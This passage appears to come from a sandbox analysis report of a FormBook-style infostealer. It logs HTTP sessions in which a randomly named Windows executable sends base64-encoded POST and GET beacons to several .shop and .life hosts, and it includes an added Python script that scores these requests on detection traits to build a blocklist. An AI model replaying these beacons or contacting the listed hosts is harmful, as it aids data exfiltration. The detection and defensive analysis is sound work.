Oct 9, 2024 14:07:23.793776035 CEST | 413 | OUT | GET /qt7h/?mHm0o=rrqhoH&ZZY=lVRVVIZsXSPU4aIYLW3uXU2G9jyJVB0KcS4/r4NcfnqYIb12Sac4jtyjmKkxLIaqvFDuni/4q4Q88o0YH0xwolv7HpcPHG6ier6546/NEIR09zDvHF3f9eFxq1b7awb/89CQg1iAKK+O HTTP/1.1
                                                                                                                Host: www.dto20.shop
                                                                                                                Accept: */*
                                                                                                                Accept-Language: en-US,en
                                                                                                                Connection: close
                                                                                                                User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SPH-L710 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.93 Mobile Safari/537.36
Oct 9, 2024 14:07:24.238322973 CEST | 412 | IN | HTTP/1.1 200 OK
                                                                                                                Server: openresty
                                                                                                                Date: Wed, 09 Oct 2024 12:07:24 GMT
                                                                                                                Content-Type: text/html
                                                                                                                Content-Length: 272
                                                                                                                Connection: close
                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 6d 48 6d 30 6f 3d 72 72 71 68 6f 48 26 5a 5a 59 3d 6c 56 52 56 56 49 5a 73 58 53 50 55 34 61 49 59 4c 57 33 75 58 55 32 47 39 6a 79 4a 56 42 30 4b 63 53 34 2f 72 34 4e 63 66 6e 71 59 49 62 31 32 53 61 63 34 6a 74 79 6a 6d 4b 6b 78 4c 49 61 71 76 46 44 75 6e 69 2f 34 71 34 51 38 38 6f 30 59 48 30 78 77 6f 6c 76 37 48 70 63 50 48 47 36 69 65 72 36 35 34 36 2f 4e 45 49 52 30 39 7a 44 76 48 46 33 66 39 65 46 78 71 31 62 37 61 77 62 2f 38 39 43 51 67 31 69 41 4b 4b 2b 4f 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?mHm0o=rrqhoH&ZZY=lVRVVIZsXSPU4aIYLW3uXU2G9jyJVB0KcS4/r4NcfnqYIb12Sac4jtyjmKkxLIaqvFDuni/4q4Q88o0YH0xwolv7HpcPHG6ier6546/NEIR09zDvHF3f9eFxq1b7awb/89CQg1iAKK+O"}</script></head></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
21 | 192.168.2.7 | 49993 | 76.223.67.189 | 80 | 1104 | C:\Program Files (x86)\jiQHbjscaMcKbPOlOroupNlgeKQaKZsecmPTcdBGPKRlFNgULSZwTYQAEfmJOzLaHJAOeFYgauUXuA\uxEGEjhWYrJv.exe
Timestamp | Bytes transferred | Direction | Data
Oct 9, 2024 14:07:37.486776114 CEST | 689 | OUT | POST /jso9/ HTTP/1.1
                                                                                                                Host: www.hampelsmagic.life
                                                                                                                Accept: */*
                                                                                                                Accept-Language: en-US,en
                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                Origin: http://www.hampelsmagic.life
                                                                                                                Content-Length: 216
                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                Connection: close
                                                                                                                Cache-Control: no-cache
                                                                                                                Referer: http://www.hampelsmagic.life/jso9/
                                                                                                                User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SPH-L710 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.93 Mobile Safari/537.36
                                                                                                                Data Raw: 5a 5a 59 3d 6a 55 46 6a 34 58 2f 64 2f 6a 4d 63 52 61 2b 4d 36 65 67 32 32 79 6a 71 4b 63 34 74 70 43 6b 42 63 68 6e 4d 56 79 73 6b 49 35 57 4a 6b 68 50 57 30 72 57 68 45 46 66 35 49 63 32 69 70 38 46 4d 71 6f 32 53 4d 55 6b 6d 55 72 42 43 41 42 52 61 39 35 4f 54 58 6f 44 76 63 4e 62 66 50 63 73 6d 56 32 4e 4b 42 47 31 34 78 78 2f 38 37 66 54 2f 54 79 56 62 65 31 59 51 31 32 4a 48 46 32 2b 63 47 53 79 38 68 61 6f 70 43 6f 49 41 59 59 2f 4a 34 34 46 57 45 49 37 64 55 72 4b 48 6c 47 6d 49 75 61 63 6f 32 66 4f 46 44 43 67 4a 4b 33 43 73 6d 62 54 4e 4c 56 7a 2f 57 64 38 78 70 61 79 58 2b 51 69 54 78 44 44 33 4a 78 52 42 54 30 41 48 33 51 3d 3d
                                                                                                                Data Ascii: ZZY=jUFj4X/d/jMcRa+M6eg22yjqKc4tpCkBchnMVyskI5WJkhPW0rWhEFf5Ic2ip8FMqo2SMUkmUrBCABRa95OTXoDvcNbfPcsmV2NKBG14xx/87fT/TyVbe1YQ12JHF2+cGSy8haopCoIAYY/J44FWEI7dUrKHlGmIuaco2fOFDCgJK3CsmbTNLVz/Wd8xpayX+QiTxDD3JxRBT0AH3Q==
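The sessions above all follow the same shape: a GET to a four-character path carrying a long base64 value in the query, then POSTs to the same path whose only form field is another base64 blob, sent with an Android User-Agent from a Windows executable and a Referer pointing back at the beacon URL. Responses differ per host (an openresty redirect to /lander from the first hosts, Shopify 404 headers from www.zingara.life further down), so the request side is the more stable thing to alert on. The script below is an added example, not part of the Joe Sandbox report: it parses the requests from sessions 20 and 21 as captured above (plus one constructed benign control with a hypothetical host and process) and scores each on the four traits just listed. The threshold of three traits, the control request, and the helper names are this example's own choices, not a vendor signature.

```python
# Added example, not Joe Sandbox code: request-side triage of the FormBook-style
# beacons captured on this page. SESSIONS holds the requests from sessions 20 and
# 21 as captured above plus one constructed benign control.
import re
from dataclasses import dataclass, field
from urllib.parse import urlsplit

PATH_RE = re.compile(r"^/[a-z0-9]{4}/$")        # /qt7h/, /jso9/, /s7qk/ on this page
B64_RE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")  # base64 alphabet, optional padding

@dataclass
class Finding:
    sid: int
    host: str
    method: str
    path: str
    reasons: list = field(default_factory=list)

    @property
    def suspicious(self):
        return len(self.reasons) >= 3   # three independent traits needed (our threshold)

def parse_request(raw):
    """Split a raw HTTP/1.1 request into (method, target, headers, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, target, headers, body

def split_form(data):
    """k=v&k2=v2 -> [(k, v)] without urllib, so '+' and '/' in base64 survive."""
    return [tuple(item.split("=", 1)) for item in data.split("&") if "=" in item]

def looks_like_b64_blob(value, min_len=64):
    return len(value) >= min_len and B64_RE.match(value) is not None

def triage(sid, process, raw):
    """Score one captured request; `process` is the sender from the session table."""
    method, target, headers, body = parse_request(raw)
    url = urlsplit(target)
    host = headers.get("host", "")
    f = Finding(sid, host, method, url.path)
    if PATH_RE.match(url.path):
        f.reasons.append("four-character beacon path")
    if method == "GET" and any(looks_like_b64_blob(v) for _, v in split_form(url.query)):
        f.reasons.append("long base64 blob as a GET query value")
    if method == "POST" and "x-www-form-urlencoded" in headers.get("content-type", ""):
        fields = split_form(body)
        if len(fields) == 1 and looks_like_b64_blob(fields[0][1]):
            f.reasons.append("single base64 form field in POST body")
    if "android" in headers.get("user-agent", "").lower() and process.lower().endswith(".exe"):
        f.reasons.append("Android User-Agent sent by a Windows executable")
    if method == "POST" and headers.get("referer") == f"http://{host}{url.path}":
        f.reasons.append("Referer equals the beacon URL")
    return f

def beacon_hosts(sessions):
    """Hosts contacted by sessions that score as beacons, for a blocklist."""
    return sorted({f.host for f in map(lambda s: triage(*s), sessions) if f.suspicious})

PROCESS = ("C:\\Program Files (x86)\\jiQHbjscaMcKbPOlOroupNlgeKQaKZsecmPTcdBGPKRlFNgULSZwTYQAEfmJOzLaHJAOeFYgauUXuA"
           "\\uxEGEjhWYrJv.exe")
UA = ("Mozilla/5.0 (Linux; Android 4.4.2; SPH-L710 Build/KOT49H) AppleWebKit/537.36 "
      "(KHTML, like Gecko) Chrome/39.0.2171.93 Mobile Safari/537.36")
CRLF = "\r\n"
SESSIONS = [
    # session 20 above: GET check-in to www.dto20.shop
    (20, PROCESS, CRLF.join([
        "GET /qt7h/?mHm0o=rrqhoH&ZZY=lVRVVIZsXSPU4aIYLW3uXU2G9jyJVB0KcS4/r4NcfnqYIb12Sac4jtyjmKkxLIaqvFDuni/4q4Q88o0YH0xwolv7HpcPHG6ier6546/NEIR09zDvHF3f9eFxq1b7awb/89CQg1iAKK+O HTTP/1.1",
        "Host: www.dto20.shop", "Accept: */*", "Accept-Language: en-US,en",
        "Connection: close", "User-Agent: " + UA, "", ""])),
    # session 21 above: POST to www.hampelsmagic.life
    (21, PROCESS, CRLF.join([
        "POST /jso9/ HTTP/1.1", "Host: www.hampelsmagic.life", "Accept: */*",
        "Accept-Language: en-US,en", "Accept-Encoding: gzip, deflate",
        "Origin: http://www.hampelsmagic.life", "Content-Length: 216",
        "Content-Type: application/x-www-form-urlencoded", "Connection: close",
        "Cache-Control: no-cache", "Referer: http://www.hampelsmagic.life/jso9/",
        "User-Agent: " + UA, "",
        "ZZY=jUFj4X/d/jMcRa+M6eg22yjqKc4tpCkBchnMVyskI5WJkhPW0rWhEFf5Ic2ip8FMqo2SMUkmUrBCABRa95OTXoDvcNbfPcsmV2NKBG14xx/87fT/TyVbe1YQ12JHF2+cGSy8haopCoIAYY/J44FWEI7dUrKHlGmIuaco2fOFDCgJK3CsmbTNLVz/Wd8xpayX+QiTxDD3JxRBT0AH3Q=="])),
    # constructed benign control; host and process are hypothetical
    (99, "C:\\Windows\\explorer.exe", CRLF.join([
        "GET /index.html HTTP/1.1", "Host: www.example.com",
        "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)", "", ""])),
]

if __name__ == "__main__":
    for sid, process, raw in SESSIONS:
        f = triage(sid, process, raw)
        verdict = "BEACON" if f.suspicious else "ok"
        print(f"session {f.sid}: {f.method} {f.host}{f.path} -> {verdict}; " + "; ".join(f.reasons))
```

The form body is split by hand rather than with `urllib.parse.parse_qsl` because that function turns `+` into a space and would break the base64 check; the `Content-Length: 216` header on session 21 is parsed but not enforced, so a truncated capture still scores. Feed the script the request side of each session and blocklist what `beacon_hosts` returns, then confirm against the destination IPs in the session table before acting, since the redirect and 404 responses here suggest several of these hosts are parked or unrelated sites rather than live C2.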


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
22 | 192.168.2.7 | 49994 | 76.223.67.189 | 80 | 1104 | C:\Program Files (x86)\jiQHbjscaMcKbPOlOroupNlgeKQaKZsecmPTcdBGPKRlFNgULSZwTYQAEfmJOzLaHJAOeFYgauUXuA\uxEGEjhWYrJv.exe
Timestamp | Bytes transferred | Direction | Data
Oct 9, 2024 14:07:40.030057907 CEST | 709 | OUT | POST /jso9/ HTTP/1.1
                                                                                                                Host: www.hampelsmagic.life
                                                                                                                Accept: */*
                                                                                                                Accept-Language: en-US,en
                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                Origin: http://www.hampelsmagic.life
                                                                                                                Content-Length: 236
                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                Connection: close
                                                                                                                Cache-Control: no-cache
                                                                                                                Referer: http://www.hampelsmagic.life/jso9/
                                                                                                                User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SPH-L710 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.93 Mobile Safari/537.36
                                                                                                                Data Raw: 5a 5a 59 3d 6a 55 46 6a 34 58 2f 64 2f 6a 4d 63 51 37 4f 4d 38 4a 38 32 39 79 6a 74 58 73 34 74 2b 53 6c 70 63 68 62 4d 56 77 42 68 49 76 6d 4a 6c 44 48 57 36 4b 57 68 4a 6c 66 35 43 38 32 64 32 73 46 39 71 6f 72 68 4d 52 6b 6d 55 72 46 43 41 46 64 61 39 4c 6d 51 46 49 44 74 52 74 61 5a 4c 63 73 6d 56 32 4e 4b 42 47 77 6c 78 78 48 38 37 50 6a 2f 42 51 74 59 64 31 59 54 79 32 4a 48 50 57 2b 59 47 53 79 65 68 59 63 50 43 73 34 41 59 59 50 4a 34 70 46 56 4b 49 37 66 59 37 4c 32 70 6d 2f 76 6f 2f 67 67 35 63 32 34 4c 54 51 44 50 42 66 4f 38 35 66 68 56 45 4c 45 53 66 59 48 2b 38 76 69 38 52 6d 4c 38 68 33 57 57 47 30 72 65 6d 68 44 68 67 43 47 54 47 70 55 39 76 4c 35 30 79 70 4d 4d 2b 38 44 49 77 45 3d
                                                                                                                Data Ascii: ZZY=jUFj4X/d/jMcQ7OM8J829yjtXs4t+SlpchbMVwBhIvmJlDHW6KWhJlf5C82d2sF9qorhMRkmUrFCAFda9LmQFIDtRtaZLcsmV2NKBGwlxxH87Pj/BQtYd1YTy2JHPW+YGSyehYcPCs4AYYPJ4pFVKI7fY7L2pm/vo/gg5c24LTQDPBfO85fhVELESfYH+8vi8RmL8h3WWG0remhDhgCGTGpU9vL50ypMM+8DIwE=


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
23 | 192.168.2.7 | 49995 | 76.223.67.189 | 80 | 1104 | C:\Program Files (x86)\jiQHbjscaMcKbPOlOroupNlgeKQaKZsecmPTcdBGPKRlFNgULSZwTYQAEfmJOzLaHJAOeFYgauUXuA\uxEGEjhWYrJv.exe
Timestamp | Bytes transferred | Direction | Data
Oct 9, 2024 14:07:42.577312946 CEST | 1722 | OUT | POST /jso9/ HTTP/1.1
                                                                                                                Host: www.hampelsmagic.life
                                                                                                                Accept: */*
                                                                                                                Accept-Language: en-US,en
                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                Origin: http://www.hampelsmagic.life
                                                                                                                Content-Length: 1248
                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                Connection: close
                                                                                                                Cache-Control: no-cache
                                                                                                                Referer: http://www.hampelsmagic.life/jso9/
                                                                                                                User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SPH-L710 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.93 Mobile Safari/537.36
                                                                                                                Data Raw: 5a 5a 59 3d 6a 55 46 6a 34 58 2f 64 2f 6a 4d 63 51 37 4f 4d 38 4a 38 32 39 79 6a 74 58 73 34 74 2b 53 6c 70 63 68 62 4d 56 77 42 68 49 73 47 4a 6b 32 4c 57 36 74 43 68 47 46 66 35 4f 63 32 59 32 73 46 67 71 6f 6a 2b 4d 52 59 32 55 70 4e 43 43 6d 56 61 30 66 79 51 63 34 44 74 59 4e 62 65 50 63 73 33 56 32 64 47 42 47 67 6c 78 78 48 38 37 4d 72 2f 58 79 56 59 62 31 59 51 31 32 4a 4c 46 32 2b 77 47 53 71 6b 68 59 49 35 44 64 45 41 62 34 66 4a 72 72 74 56 47 49 37 42 5a 4c 4c 75 70 6d 44 77 6f 37 4a 62 35 64 53 65 4c 51 41 44 50 32 36 36 73 4b 54 31 4c 57 6e 33 62 2b 6b 41 34 74 66 50 36 43 79 6b 38 6a 36 74 66 57 51 2b 51 6b 64 6f 72 31 62 53 4a 67 52 48 6c 72 6d 73 31 32 4d 6c 66 4f 73 58 62 6e 6c 4a 33 68 64 66 31 31 41 57 73 68 34 52 68 70 79 45 43 6e 68 76 4b 47 42 43 34 43 65 53 77 4a 37 63 4f 75 53 59 63 76 4b 62 74 50 6e 44 73 78 58 53 48 65 78 38 69 53 61 50 69 50 7a 71 52 44 6e 5a 36 6c 6c 76 68 33 75 45 43 65 71 73 76 58 51 48 6c 6c 4e 51 5a 6a 67 30 59 5a 71 64 33 78 51 49 30 46 74 53 2b 50 [TRUNCATED]
                                                                                                                Data Ascii: ZZY=jUFj4X/d/jMcQ7OM8J829yjtXs4t+SlpchbMVwBhIsGJk2LW6tChGFf5Oc2Y2sFgqoj+MRY2UpNCCmVa0fyQc4DtYNbePcs3V2dGBGglxxH87Mr/XyVYb1YQ12JLF2+wGSqkhYI5DdEAb4fJrrtVGI7BZLLupmDwo7Jb5dSeLQADP266sKT1LWn3b+kA4tfP6Cyk8j6tfWQ+Qkdor1bSJgRHlrms12MlfOsXbnlJ3hdf11AWsh4RhpyECnhvKGBC4CeSwJ7cOuSYcvKbtPnDsxXSHex8iSaPiPzqRDnZ6llvh3uECeqsvXQHllNQZjg0YZqd3xQI0FtS+PQsxgFvfUCZvm48+fHhnydDp77UIfKpe7Gndk6nwgBQcFHANwmHitnv+ZlYwiQnfvynufckPBF8tkCTSicQGnBbAo0dQs6OJ5AfN2trmBrePyRiHZRSK1POSymeWCRBQHbYYdtFT2S61doa+EKoka9NO1SyDHlWtomPrm8PjJywy6CYuimZ0Hwg6rYTz7kArndHNjoDiOsR+OxL4Z7gPchLd2iOofRZcBAAN7P1CL6Ct+SfZfAxl6mufMxgtRcCgGMuoG0M2mRd+GEb+1B4rHccTdjl/S0/577KPOFWd1a5B3/UrrO/uaiNQFVE98T16t9lBkOVPvsvEunqlcqx9ZaVMcpfgomrg1kVHZOb8QD8BrGH+49F6hxK4B6NVsKk/QUD78BqOPS5YUnriTziQGs+EX3w1l57Tpn4B6WYevqUw+U9y8KNfZ9vUnGkQODRoUJM/PmfXQ2G0y7EdqKElF0NFxyD4z/eySnZWxa2QjeDe2aM8lPRXF2spOINhfhSYqwYWxnLurkU85t8yRUnIC+TVBoyv3qrzlAgqeYbpRr/n3jxesiXK4KMlyMLpvCczFJ/9fBa5gDt6KqgEoM6OhQee1ZxJydBIryqgBU0NbLaj7hIrWUYMVtD/pnbWeUr5YNzODaJi9/YpSljL1zpIFdJxycFMR5JUGf8 [TRUNCATED]


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
24 | 192.168.2.7 | 49996 | 76.223.67.189 | 80 | 1104 | C:\Program Files (x86)\jiQHbjscaMcKbPOlOroupNlgeKQaKZsecmPTcdBGPKRlFNgULSZwTYQAEfmJOzLaHJAOeFYgauUXuA\uxEGEjhWYrJv.exe
Timestamp | Bytes transferred | Direction | Data
Oct 9, 2024 14:07:45.118097067 CEST | 420 | OUT | GET /jso9/?mHm0o=rrqhoH&ZZY=uWtD7nDJzC5KbaeYt4wzjwT7dfNvmhcBXDjCWDtDb+iw4yKFuJufFHLJAdi3pLpd6ZSxNjMYLeNLKkNP8PCKZOHQQMiufYU5amodYVRyhU2Q7ZK2dy5aUiQd9WIqGEuwGA/AmJwbELRk HTTP/1.1
                                                                                                                Host: www.hampelsmagic.life
                                                                                                                Accept: */*
                                                                                                                Accept-Language: en-US,en
                                                                                                                Connection: close
                                                                                                                User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SPH-L710 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.93 Mobile Safari/537.36
Oct 9, 2024 14:07:45.587131023 CEST | 412 | IN | HTTP/1.1 200 OK
                                                                                                                Server: openresty
                                                                                                                Date: Wed, 09 Oct 2024 12:07:45 GMT
                                                                                                                Content-Type: text/html
                                                                                                                Content-Length: 272
                                                                                                                Connection: close
                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 6d 48 6d 30 6f 3d 72 72 71 68 6f 48 26 5a 5a 59 3d 75 57 74 44 37 6e 44 4a 7a 43 35 4b 62 61 65 59 74 34 77 7a 6a 77 54 37 64 66 4e 76 6d 68 63 42 58 44 6a 43 57 44 74 44 62 2b 69 77 34 79 4b 46 75 4a 75 66 46 48 4c 4a 41 64 69 33 70 4c 70 64 36 5a 53 78 4e 6a 4d 59 4c 65 4e 4c 4b 6b 4e 50 38 50 43 4b 5a 4f 48 51 51 4d 69 75 66 59 55 35 61 6d 6f 64 59 56 52 79 68 55 32 51 37 5a 4b 32 64 79 35 61 55 69 51 64 39 57 49 71 47 45 75 77 47 41 2f 41 6d 4a 77 62 45 4c 52 6b 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?mHm0o=rrqhoH&ZZY=uWtD7nDJzC5KbaeYt4wzjwT7dfNvmhcBXDjCWDtDb+iw4yKFuJufFHLJAdi3pLpd6ZSxNjMYLeNLKkNP8PCKZOHQQMiufYU5amodYVRyhU2Q7ZK2dy5aUiQd9WIqGEuwGA/AmJwbELRk"}</script></head></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
25 | 192.168.2.7 | 49997 | 23.227.38.74 | 80 | 1104 | C:\Program Files (x86)\jiQHbjscaMcKbPOlOroupNlgeKQaKZsecmPTcdBGPKRlFNgULSZwTYQAEfmJOzLaHJAOeFYgauUXuA\uxEGEjhWYrJv.exe
Timestamp | Bytes transferred | Direction | Data
Oct 9, 2024 14:07:50.720276117 CEST | 674 | OUT | POST /s7qk/ HTTP/1.1
                                                                                                                Host: www.zingara.life
                                                                                                                Accept: */*
                                                                                                                Accept-Language: en-US,en
                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                Origin: http://www.zingara.life
                                                                                                                Content-Length: 216
                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                Connection: close
                                                                                                                Cache-Control: no-cache
                                                                                                                Referer: http://www.zingara.life/s7qk/
                                                                                                                User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SPH-L710 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.93 Mobile Safari/537.36
                                                                                                                Data Raw: 5a 5a 59 3d 76 59 77 65 7a 49 6b 78 59 4b 68 50 68 73 33 30 71 6f 65 68 61 73 36 77 59 2f 78 50 53 6f 49 49 38 68 4d 52 62 5a 39 48 79 78 73 6f 45 41 58 4b 70 59 4f 31 2b 77 66 67 57 63 43 2f 56 62 38 50 47 4e 2b 42 4b 74 52 41 76 44 44 31 49 54 63 66 58 72 35 37 4d 43 38 73 77 62 30 77 66 4c 77 4a 42 6c 70 72 43 6e 4b 36 7a 58 76 51 4e 46 43 61 30 75 63 69 68 39 68 42 54 4e 6b 79 63 49 58 53 77 6e 63 67 67 51 2f 31 6d 30 61 50 55 45 55 2f 6a 54 73 31 66 43 66 59 37 45 4a 2b 51 52 69 46 32 50 69 68 64 45 75 67 78 69 6d 4c 33 4d 47 57 7a 30 64 30 68 6d 6f 61 44 6a 72 49 31 77 6f 66 42 51 56 6c 70 71 59 72 68 6f 57 70 62 64 2f 65 58 67 3d 3d
                                                                                                                Data Ascii: ZZY=vYwezIkxYKhPhs30qoehas6wY/xPSoII8hMRbZ9HyxsoEAXKpYO1+wfgWcC/Vb8PGN+BKtRAvDD1ITcfXr57MC8swb0wfLwJBlprCnK6zXvQNFCa0ucih9hBTNkycIXSwncggQ/1m0aPUEU/jTs1fCfY7EJ+QRiF2PihdEugximL3MGWz0d0hmoaDjrI1wofBQVlpqYrhoWpbd/eXg==
Oct 9, 2024 14:07:51.686175108 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                Date: Wed, 09 Oct 2024 12:07:51 GMT
                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                Transfer-Encoding: chunked
                                                                                                                Connection: close
                                                                                                                x-sorting-hat-podid: 156
                                                                                                                x-sorting-hat-shopid: 68129128605
                                                                                                                vary: Accept-Encoding,Accept
                                                                                                                x-frame-options: DENY
                                                                                                                x-shopid: 68129128605
                                                                                                                x-shardid: 156
                                                                                                                content-language: en-IN
                                                                                                                x-shopify-nginx-no-cookies: 0
                                                                                                                set-cookie: _tracking_consent=%7B%22con%22%3A%7B%22CMP%22%3A%7B%22a%22%3A%22%22%2C%22m%22%3A%22%22%2C%22p%22%3A%22%22%2C%22s%22%3A%22%22%7D%7D%2C%22v%22%3A%222.1%22%2C%22region%22%3A%22USNY%22%2C%22reg%22%3A%22%22%7D; domain=zingara.life; path=/; expires=Thu, 10 Oct 2024 12:07:51 GMT; SameSite=Lax
                                                                                                                set-cookie: _cmp_a=%7B%22purposes%22%3A%7B%22a%22%3Atrue%2C%22p%22%3Atrue%2C%22m%22%3Atrue%2C%22t%22%3Atrue%7D%2C%22display_banner%22%3Afalse%2C%22sale_of_data_region%22%3Afalse%7D; domain=zingara.life; path=/; expires=Thu, 10 Oct 2024 12:07:51 GMT; SameSite=Lax
                                                                                                                set-cookie: localization=IN; path=/; expires=Thu, 09 Oct 2025 12:07:51 GMT; SameSite=Lax
                                                                                                                set-cookie: _shopify_y=2a006b9e-2410-43a9-ad69-41888273dea8; Expires=Thu, 09-Oct-25 12:07:51 GMT; Domain=zingara.life; Path=/; SameSite=Lax
                                                                                                                set-cookie: _shopify_s=25a32db8-d952-465f-870e-9f90c6ffc1bd; Expires=Wed, 09-Oct-24
                                                                                                                Data Raw:
                                                                                                                Data Ascii:
Oct 9, 2024 14:07:51.686234951 CEST | 1236 | IN | Data Raw: 31 32 3a 33 37 3a 35 31 20 47 4d 54 3b 20 44 6f 6d 61 69 6e 3d 7a 69 6e 67 61 72 61 2e 6c 69 66 65 3b 20 50 61 74 68 3d 2f 3b 20 53 61 6d 65 53 69 74 65 3d 4c 61 78 0d 0a 78 2d 72 65 71 75 65 73 74 2d 69 64 3a 20 66 65 31 61 66 65 62 39 2d 33 33
                                                                                                                Data Ascii: 12:37:51 GMT; Domain=zingara.life; Path=/; SameSite=Laxx-request-id: fe1afeb9-33ca-4dfd-9b8f-b9d803a34723-1728475671server-timing: processing;dur=236content-security-policy: frame-ancestors 'none'; report-uri /csp-report?source%5Baction%
Oct 9, 2024 14:07:51.686248064 CEST | 1236 | IN | Data Raw: 61 74 69 6f 6e 3b 64 75 72 3d 33 30 32 2e 39 39 39 39 37 33 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 66 65 34 30 62 30 37 63 35 37 37 63 37 63 2d 45 57 52 0d 0a 0d 0a 36 37 39 0d 0a 1f 8b 08
                                                                                                                Data Ascii: ation;dur=302.999973Server: cloudflareCF-RAY: 8cfe40b07c577c7c-EWR679X[o6~Th)[*kvv:`hFv}(Kr~Q%w\}4CGPR^<B(QIPQQrr-.$5Hs85dGW**x#irzP@K
Oct 9, 2024 14:07:51.686259985 CEST | 507 | IN | Data Raw: f3 15 b9 a5 e2 6b 6a 63 1c 0d 5a 93 24 f9 aa d2 93 5a 22 1a 08 c6 03 9e 9c dc 48 d3 41 de 5d 30 3f 54 a4 a5 c6 b0 bb 41 b4 e1 cc 5b 22 2b 04 e1 7c 1b a5 fe 6c 89 dd d0 4f 96 31 ba 8c 16 7e 1c a5 ae 17 fa b3 c5 12 01 50 69 ba b0 bb 18 68 c2 b8 a7
                                                                                                                Data Ascii: kjcZ$Z"HA]0?TA["+|lO1~Pih.;/|ty@p7\!}lVWpuvxYc`]Mqt"~8N/_c"JTn<P8|$p=]>6BblS?VfAs r^a


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
26 | 192.168.2.7 | 49998 | 23.227.38.74 | 80 | 1104 | C:\Program Files (x86)\jiQHbjscaMcKbPOlOroupNlgeKQaKZsecmPTcdBGPKRlFNgULSZwTYQAEfmJOzLaHJAOeFYgauUXuA\uxEGEjhWYrJv.exe
Timestamp | Bytes transferred | Direction | Data
Oct 9, 2024 14:07:53.343225956 CEST | 694 | OUT | POST /s7qk/ HTTP/1.1
                                                                                                                Host: www.zingara.life
                                                                                                                Accept: */*
                                                                                                                Accept-Language: en-US,en
                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                Origin: http://www.zingara.life
                                                                                                                Content-Length: 236
                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                Connection: close
                                                                                                                Cache-Control: no-cache
                                                                                                                Referer: http://www.zingara.life/s7qk/
                                                                                                                User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SPH-L710 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.93 Mobile Safari/537.36
                                                                                                                Data Raw: 5a 5a 59 3d 76 59 77 65 7a 49 6b 78 59 4b 68 50 75 74 48 30 6f 4a 65 68 53 73 36 7a 64 2f 78 50 63 49 4a 50 38 68 41 52 62 62 52 74 79 44 49 6f 4b 42 6e 4b 37 74 36 31 7a 51 66 67 59 38 44 30 49 72 38 59 47 4e 69 6a 4b 6f 35 41 76 43 6e 31 49 54 73 66 55 59 68 36 4f 53 38 75 38 37 30 79 41 62 77 4a 42 6c 70 72 43 6e 76 52 7a 54 44 51 4d 30 79 61 37 72 38 6c 6f 64 68 47 45 39 6b 79 57 6f 58 57 77 6e 63 53 67 52 6a 66 6d 78 65 50 55 42 77 2f 6a 69 73 71 52 43 66 65 6c 30 4a 72 52 78 6e 4a 73 36 32 49 63 6c 57 6a 31 53 57 4a 37 61 62 30 70 57 52 59 2f 33 51 68 48 68 50 2b 69 57 31 71 44 52 52 39 6b 49 73 4b 2b 66 7a 44 57 50 65 61 42 62 45 65 70 7a 4c 35 2f 33 78 6f 50 31 2b 51 77 46 2f 30 51 47 63 3d
